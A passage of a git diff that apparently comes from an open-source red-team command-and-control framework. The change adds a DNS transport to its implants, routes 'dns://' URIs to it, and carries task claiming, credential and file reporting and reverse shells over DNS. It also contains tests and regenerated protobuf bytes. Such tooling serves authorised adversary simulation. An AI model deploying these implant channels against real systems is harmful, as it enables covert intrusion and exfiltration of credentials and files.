mut buf = Vec::new(); + status_packet.encode(&mut buf).unwrap(); + + let result = DNS::process_chunk_response(&buf, 1, 10); + assert!(result.is_ok()); + + let (acks, nacks) = result.unwrap(); + assert!(acks.contains(&1)); + assert!(acks.contains(&2)); + assert!(acks.contains(&3)); + assert!(nacks.contains(&5)); + assert!(nacks.contains(&6)); + } +} diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs index f5d735376..44b51ff39 100644 --- a/implants/lib/transport/src/lib.rs +++ b/implants/lib/transport/src/lib.rs @@ -11,6 +11,9 @@ mod dns_resolver; #[cfg(feature = "http1")] mod http; +#[cfg(feature = "dns")] +mod dns; + #[cfg(feature = "mock")] mod mock; #[cfg(feature = "mock")] @@ -25,6 +28,8 @@ pub enum ActiveTransport { Grpc(grpc::GRPC), #[cfg(feature = "http1")] Http(http::HTTP), + #[cfg(feature = "dns")] + Dns(dns::DNS), #[cfg(feature = "mock")] Mock(mock::MockTransport), Empty, @@ -71,6 +76,16 @@ impl Transport for ActiveTransport { return Err(anyhow!("http1 transport not enabled")); } + // 4. DNS + s if s.starts_with("dns://") => { + #[cfg(feature = "dns")] + { + Ok(ActiveTransport::Dns(dns::DNS::new(s, proxy_uri)?)) + } + #[cfg(not(feature = "dns"))] + return Err(anyhow!("DNS transport not enabled")); + } + _ => Err(anyhow!("Could not determine transport from URI: {}", uri)), } } @@ -81,6 +96,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.claim_tasks(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.claim_tasks(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.claim_tasks(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.claim_tasks(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -97,6 +114,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.fetch_asset(request, sender).await, #[cfg(feature = "http1")] Self::Http(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.fetch_asset(request, sender).await, #[cfg(feature = "mock")] Self::Mock(t) => t.fetch_asset(request, sender).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -112,6 +131,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_credential(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_credential(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_credential(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_credential(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -127,6 +148,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_file(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_file(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_file(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_file(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -142,6 +165,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_process_list(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_process_list(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_process_list(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_process_list(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -157,6 +182,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_task_output(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_task_output(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_task_output(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_task_output(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -173,6 +200,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.reverse_shell(rx, tx).await, #[cfg(feature = "http1")] Self::Http(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.reverse_shell(rx, tx).await, #[cfg(feature = "mock")] Self::Mock(t) => t.reverse_shell(rx, tx).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -185,6 +214,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.get_type(), #[cfg(feature = "http1")] Self::Http(t) => t.get_type(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.get_type(), #[cfg(feature = "mock")] Self::Mock(t) => t.get_type(), Self::Empty => beacon::Transport::Unspecified, @@ -197,6 +228,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.is_active(), #[cfg(feature = "http1")] Self::Http(t) => t.is_active(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.is_active(), #[cfg(feature = "mock")] Self::Mock(t) => t.is_active(), Self::Empty => false, @@ -209,6 +242,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.name(), #[cfg(feature = "http1")] Self::Http(t) => t.name(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.name(), #[cfg(feature = "mock")] Self::Mock(t) => t.name(), Self::Empty => "none", @@ -222,6 +257,8 @@ impl Transport for ActiveTransport { list.push("grpc".to_string()); #[cfg(feature = "http1")] list.push("http".to_string()); + #[cfg(feature = "dns")] + list.push("dns".to_string()); #[cfg(feature = "mock")] list.push("mock".to_string()); list @@ -274,6 +311,27 @@ mod tests { } } + #[tokio::test] + #[cfg(feature = "dns")] + async fn test_routes_to_dns_transport() { + // DNS URIs should result in the Dns variant + let inputs = vec![ + "dns://8.8.8.8:53?domain=example.com", + "dns://*?domain=example.com&type=txt", + "dns://1.1.1.1?domain=test.com&type=a", + ]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + assert!( + matches!(result, Ok(ActiveTransport::Dns(_))), + "URI '{}' did not resolve to ActiveTransport::Dns", + uri + ); + } + } + #[tokio::test] #[cfg(not(feature = "grpc"))] async fn test_grpc_disabled_error() { diff --git a/tavern/app.go b/tavern/app.go index c6c89be32..48e42a948 100644 --- a/tavern/app.go +++ b/tavern/app.go @@ -39,6 +39,7 @@ import ( "realm.pub/tavern/internal/www" "realm.pub/tavern/tomes" + _ "realm.pub/tavern/internal/redirectors/dns" _ "realm.pub/tavern/internal/redirectors/grpc" _ "realm.pub/tavern/internal/redirectors/http1" ) diff --git a/tavern/internal/c2/c2pb/c2.pb.go b/tavern/internal/c2/c2pb/c2.pb.go index 559185abb..21b96cf30 100644 --- a/tavern/internal/c2/c2pb/c2.pb.go +++ b/tavern/internal/c2/c2pb/c2.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.5 -// protoc v3.21.12 +// protoc-gen-go v1.36.11 +// protoc v6.32.0 // source: c2.proto package c2pb @@ -78,6 +78,7 @@ const ( Beacon_TRANSPORT_UNSPECIFIED Beacon_Transport = 0 Beacon_TRANSPORT_GRPC Beacon_Transport = 1 Beacon_TRANSPORT_HTTP1 Beacon_Transport = 2 + Beacon_TRANSPORT_DNS Beacon_Transport = 3 ) // Enum value maps for Beacon_Transport. @@ -86,11 +87,13 @@ var ( 0: "TRANSPORT_UNSPECIFIED", 1: "TRANSPORT_GRPC", 2: "TRANSPORT_HTTP1", + 3: "TRANSPORT_DNS", } Beacon_Transport_value = map[string]int32{ "TRANSPORT_UNSPECIFIED": 0, "TRANSPORT_GRPC": 1, "TRANSPORT_HTTP1": 2, + "TRANSPORT_DNS": 3, } ) @@ -1195,170 +1198,103 @@ func (x *ReverseShellResponse) GetData() []byte { var File_c2_proto protoreflect.FileDescriptor -var file_c2_proto_rawDesc = string([]byte{ - 0x0a, 0x08, 0x63, 0x32, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x02, 0x63, 0x32, 0x1a, 0x1f, - 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, - 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, - 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, - 0x27, 0x0a, 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, - 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x22, 0xa6, 0x02, 0x0a, 0x06, 0x42, 0x65, 0x61, - 0x63, 0x6f, 0x6e, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, - 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, - 0x69, 0x65, 0x72, 0x12, 0x1c, 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, - 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, - 0x6c, 0x12, 0x1c, 0x0a, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, - 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x52, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x12, - 0x1f, 0x0a, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x09, - 0x2e, 0x63, 0x32, 0x2e, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x52, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, - 0x12, 0x1a, 0x0a, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, 0x61, 0x6c, 0x18, 0x05, 0x20, 0x01, - 0x28, 0x04, 0x52, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, 0x61, 0x6c, 0x12, 0x32, 0x0a, 0x09, - 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x0e, 0x32, - 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x2e, 0x54, 0x72, 0x61, 0x6e, - 0x73, 0x70, 0x6f, 0x72, 0x74, 0x52, 0x09, 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, - 0x22, 0x4f, 0x0a, 0x09, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x12, 0x19, 0x0a, - 0x15, 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, - 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x12, 0x0a, 0x0e, 0x54, 0x52, 0x41, 0x4e, - 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x47, 0x52, 0x50, 0x43, 0x10, 0x01, 0x12, 0x13, 0x0a, 0x0f, - 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x48, 0x54, 0x54, 0x50, 0x31, 0x10, - 0x02, 0x22, 0xfe, 0x01, 0x0a, 0x04, 0x48, 0x6f, 0x73, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, - 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, - 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, - 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x2d, - 0x0a, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0e, - 0x32, 0x11, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x2e, 0x50, 0x6c, 0x61, 0x74, 0x66, - 0x6f, 0x72, 0x6d, 0x52, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x1d, 0x0a, - 0x0a, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x5f, 0x69, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, - 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x49, 0x70, 0x22, 0x74, 0x0a, 0x08, - 0x50, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x18, 0x0a, 0x14, 0x50, 0x4c, 0x41, 0x54, - 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, - 0x10, 0x00, 0x12, 0x14, 0x0a, 0x10, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x57, - 0x49, 0x4e, 0x44, 0x4f, 0x57, 0x53, 0x10, 0x01, 0x12, 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, - 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4c, 0x49, 0x4e, 0x55, 0x58, 0x10, 0x02, 0x12, 0x12, 0x0a, 0x0e, - 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4d, 0x41, 0x43, 0x4f, 0x53, 0x10, 0x03, - 0x12, 0x10, 0x0a, 0x0c, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x42, 0x53, 0x44, - 0x10, 0x04, 0x22, 0x59, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, - 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x22, 0x0a, 0x04, 0x74, 0x6f, - 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, - 0x74, 0x63, 0x68, 0x2e, 0x54, 0x6f, 0x6d, 0x65, 0x52, 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x12, 0x1d, - 0x0a, 0x0a, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x09, 0x71, 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x1d, 0x0a, - 0x09, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, 0x0a, 0x03, 0x6d, 0x73, - 0x67, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, 0x22, 0xe3, 0x01, 0x0a, - 0x0a, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, - 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x16, 0x0a, 0x06, 0x6f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x6f, 0x75, 0x74, - 0x70, 0x75, 0x74, 0x12, 0x23, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x18, 0x03, 0x20, 0x01, - 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, - 0x72, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, 0x65, 0x78, 0x65, 0x63, - 0x5f, 0x73, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, - 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, - 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0d, 0x65, - 0x78, 0x65, 0x63, 0x53, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, 0x12, 0x44, 0x0a, 0x10, - 0x65, 0x78, 0x65, 0x63, 0x5f, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x5f, 0x61, 0x74, - 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, - 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, - 0x6d, 0x70, 0x52, 0x0e, 0x65, 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, - 0x41, 0x74, 0x22, 0x37, 0x0a, 0x11, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, - 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x22, 0x0a, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, - 0x6e, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0a, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, - 0x63, 0x6f, 0x6e, 0x52, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x22, 0x34, 0x0a, 0x12, 0x43, - 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, - 0x65, 0x12, 0x1e, 0x0a, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, - 0x32, 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x05, 0x74, 0x61, 0x73, 0x6b, - 0x73, 0x22, 0x27, 0x0a, 0x11, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, - 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x01, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x22, 0x2a, 0x0a, 0x12, 0x46, 0x65, - 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, - 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, - 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x68, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x34, 0x0a, 0x0a, 0x63, 0x72, - 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, - 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x61, 0x6c, 0x52, 0x0a, 0x63, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, - 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x52, 0x0a, 0x11, - 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x24, 0x0a, 0x05, 0x63, 0x68, - 0x75, 0x6e, 0x6b, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, - 0x69, 0x74, 0x63, 0x68, 0x2e, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, - 0x22, 0x14, 0x0a, 0x12, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, - 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x5e, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, - 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x29, 0x0a, 0x04, 0x6c, - 0x69, 0x73, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x65, 0x6c, 0x64, 0x72, - 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, - 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x22, 0x1b, 0x0a, 0x19, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, - 0x6e, 0x73, 0x65, 0x22, 0x41, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, - 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x26, - 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, - 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x06, - 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, - 0x73, 0x65, 0x22, 0x73, 0x0a, 0x13, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, - 0x6c, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, - 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, - 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, - 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, - 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x12, 0x17, - 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x03, 0x52, - 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x22, 0x5b, 0x0a, 0x14, 0x52, 0x65, 0x76, 0x65, 0x72, - 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, - 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, - 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, - 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, - 0x64, 0x61, 0x74, 0x61, 0x2a, 0x8f, 0x01, 0x0a, 0x17, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, - 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, - 0x12, 0x2a, 0x0a, 0x26, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, - 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x55, - 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x23, 0x0a, 0x1f, - 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, 0x4c, 0x5f, 0x4d, 0x45, - 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x44, 0x41, 0x54, 0x41, 0x10, - 0x01, 0x12, 0x23, 0x0a, 0x1f, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, - 0x4c, 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, - 0x50, 0x49, 0x4e, 0x47, 0x10, 0x02, 0x32, 0xfc, 0x03, 0x0a, 0x02, 0x43, 0x32, 0x12, 0x3d, 0x0a, - 0x0a, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x12, 0x15, 0x2e, 0x63, 0x32, - 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, - 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x3d, 0x0a, 0x0a, - 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, - 